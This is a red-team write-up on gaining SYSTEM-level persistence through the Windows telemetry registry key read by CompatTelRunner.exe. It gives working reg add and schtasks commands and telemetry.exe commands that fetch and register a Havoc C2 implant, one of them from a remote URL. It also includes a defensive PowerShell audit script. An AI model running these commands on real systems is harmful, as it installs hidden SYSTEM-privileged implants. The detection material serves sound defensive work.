Persistence – Windows Telemetry
Microsoft introduced compatibility telemetry to collect usage and performance data about Windows systems. The telemetry tasks are executed by the binary “CompatTelRunner.exe”, which is stored in the following location:
CompatTelRunner executes a variety of commands that it retrieves from specific registry keys. TrustedSec identified that this mechanism can be abused for persistence during red team operations once elevated access has been obtained, since the relevant keys live under HKLM and writing them requires administrative privileges.
The persistence method requires the following steps:
- Creation of a registry subkey under the “TelemetryController” key
- Creation of a “Command” value (REG_SZ) that holds the arbitrary command or implant path to execute
- Creation of a “Nightly” value (REG_DWORD) with the data set to 1
- Execution of the “Microsoft Compatibility Appraiser” scheduled task via the schtasks binary
The above methodology can be achieved by executing the following commands from the command line:
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\TelemetryController\Persistence"
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\TelemetryController\Persistence" /v Command /t REG_SZ /d "C:\Users\Peter\Downloads\demon.x64.exe"
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\TelemetryController\Persistence" /v Nightly /t REG_DWORD /d 1
schtasks /run /tn "\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser"
Windows Telemetry Persistence – Command Prompt
Execution of the above commands will result in the following modifications to the registry, as displayed below:
Windows Telemetry Persistence – Registry
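The registry footprint above is also what a defender hunts for. The following PowerShell is an added example (not part of the original post, nor of the TrustedSec or Telemetry tooling): it enumerates every subkey under TelemetryController, resolves the executable named in each Command value and flags entries whose binary lives outside System32 or does not carry a valid Authenticode signature. The function name and the “Suspicious” heuristic are this example's own assumptions; the Nightly property it reports is the value the technique above sets.

```powershell
# Added example: audit the TelemetryController key that CompatTelRunner.exe reads.
# Function name and the Suspicious heuristic are assumptions of this example.
function Get-TelemetryControllerCommands {
    [CmdletBinding()]
    param(
        # The key CompatTelRunner enumerates; override only when testing against a loaded hive.
        [string]$BasePath = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\TelemetryController'
    )

    if (-not (Test-Path -LiteralPath $BasePath)) {
        Write-Warning "Key not found: $BasePath"
        return
    }

    $system32 = Join-Path $env:SystemRoot 'System32'

    Get-ChildItem -LiteralPath $BasePath | ForEach-Object {
        $props   = Get-ItemProperty -LiteralPath $_.PSPath
        $command = $props.Command
        if (-not $command) { return }   # a subkey with no Command value runs nothing

        # Pull the executable out of the command line: quoted path or first token.
        if ($command -match '^\s*"([^"]+)"') { $exe = $Matches[1] }
        else { $exe = ($command -split '\s+', 2)[0] }
        $exe = [Environment]::ExpandEnvironmentVariables($exe)

        $inSystem32 = $exe.StartsWith($system32, [StringComparison]::OrdinalIgnoreCase)
        $signature  = if (Test-Path -LiteralPath $exe) {
            (Get-AuthenticodeSignature -FilePath $exe).Status
        } else { 'FileMissing' }

        [pscustomobject]@{
            SubKey     = $_.PSChildName
            Command    = $command
            Executable = $exe
            Nightly    = $props.Nightly
            Signature  = $signature
            Suspicious = (-not $inSystem32) -or ($signature -ne 'Valid')
        }
    }
}

# Usage: list only the entries worth a second look.
Get-TelemetryControllerCommands | Where-Object Suspicious | Format-List
```

Reading HKLM\SOFTWARE does not require elevation, so this runs from a standard user session. Compare the output against a known-good baseline of the same host build rather than treating every subkey as malicious, and remember that the Persistence subkey created above is removed simply by deleting that key with reg delete.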
Establishing persistence via Windows Telemetry can be achieved from an elevated implant session.
Windows Telemetry Persistence – Havoc C2 Implant
Telemetry (see References) is a C# binary that implements this persistence method, allowing red teams to point a local path at an arbitrary payload to be executed.
shell telemetry.exe install /path:C:\Users\peter\Downloads\demon.x64.exe
Windows Telemetry Persistence – Havoc C2 Telemetry Local Install
Alternatively, Telemetry can download an implant from a remote location to disk before registering it.
shell telemetry.exe install /url:http://10.0.0.3:9000/demon.x64.exe
Windows Telemetry Persistence – Havoc C2 Telemetry Remote Download
Upon execution the tool will create the required registry structure as displayed in the image below:
Windows Telemetry Persistence – Registry Telemetry
The implant is executed in the context of the “CompatTelRunner.exe” process.
Windows Telemetry Persistence – Implant
The scheduled task is configured to run the “CompatTelRunner.exe” binary with SYSTEM-level privileges, and therefore the implant executes with the same privileges.
Windows Telemetry Persistence – C2 Sessions
This can be verified by executing the “whoami” command.
Windows Telemetry Persistence – whoami
The following image displays the active sessions in the compromised host.
Windows Telemetry Persistence – Havoc C2 Session Graph
References
- https://trustedsec.com/blog/abusing-windows-telemetry-for-persistence
- https://github.com/Imanfeng/Telemetry